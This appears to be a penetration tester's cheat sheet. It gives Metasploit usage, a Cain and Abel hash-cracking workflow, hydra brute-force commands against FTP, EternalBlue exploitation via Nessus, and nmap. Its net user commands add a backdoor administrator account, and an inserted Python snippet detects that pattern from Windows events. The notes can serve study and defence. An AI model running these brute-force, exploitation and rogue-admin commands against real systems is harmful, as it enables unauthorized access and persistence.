search vulnerability_name
use exploit/name
show payloads
set payload payload_name
show options
set RHOST hostname
show options
exploit
=====Meterpreter====
==cain===
1: set target ip
2: enumerate users
3: then use hydra -l user -P rockyou.txt ftp://ip
4: reconnect with the user
5: install Abel
6: reconnect and go to hashes
7: find the admin entry ending with 500
8: send to cracker
9: reset initial position
10: start; the password will then be cracked. Now log in as admin and create a new user
11: net user username password /add (for adding users)
12: net localgroup administrators username /add (for adding as an administrator)
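A defender-side view of steps 11 and 12, as an added example that is not part of the original notes: creating a local account and then adding it to the Administrators group leaves Windows Security events 4720 and 4732, which can be correlated on the new account's SID. The event records, account names, SIDs and the 10-minute window below are constructed assumptions for illustration.

```python
from datetime import datetime, timedelta

ADMIN_GROUP_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators
WINDOW = timedelta(minutes=10)     # assumed correlation window

# Constructed sample records (not real logs), shaped like exported Security events.
EVENTS = [
    {"EventID": 4720, "Time": "2024-01-01T10:00:05", "SubjectUserName": "Administrator",
     "TargetUserName": "svc_backup", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"EventID": 4732, "Time": "2024-01-01T10:00:40", "SubjectUserName": "Administrator",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetSid": ADMIN_GROUP_SID},
    # Benign contrast: new account added to Remote Desktop Users, not Administrators.
    {"EventID": 4720, "Time": "2024-01-01T11:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"EventID": 4732, "Time": "2024-01-01T11:01:00", "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1-2-3-1106", "TargetSid": "S-1-5-32-555"},
]

def find_new_admin_accounts(events, window=WINDOW):
    """Alert on accounts created (4720) and added to local Administrators (4732) within `window`."""
    created = {}   # new account SID -> (creation time, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4720:
            # In 4720, TargetSid is the SID of the account that was just created.
            created[ev["TargetSid"]] = (when, ev["TargetUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMIN_GROUP_SID:
            # In 4732, TargetSid is the group and MemberSid is the account added to it.
            hit = created.get(ev["MemberSid"])
            if hit and when - hit[0] <= window:
                alerts.append({"account": hit[1], "actor": ev["SubjectUserName"],
                               "seconds_after_creation": int((when - hit[0]).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in find_new_admin_accounts(EVENTS):
        print(alert)
```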
*********NESSUS**************
1: start nessus service
/etc/init.d/nessusd start
2: start scanning
3: find exploit number, something like MS17_010_eternalblue, etc.
4: Exploit
=====NMAP=======
nmap -A IP Address
===hydra===
hydra -L dictionary path -P dictionary path ftp://ip (if you don't know the username and password)
====SQL INJECTION========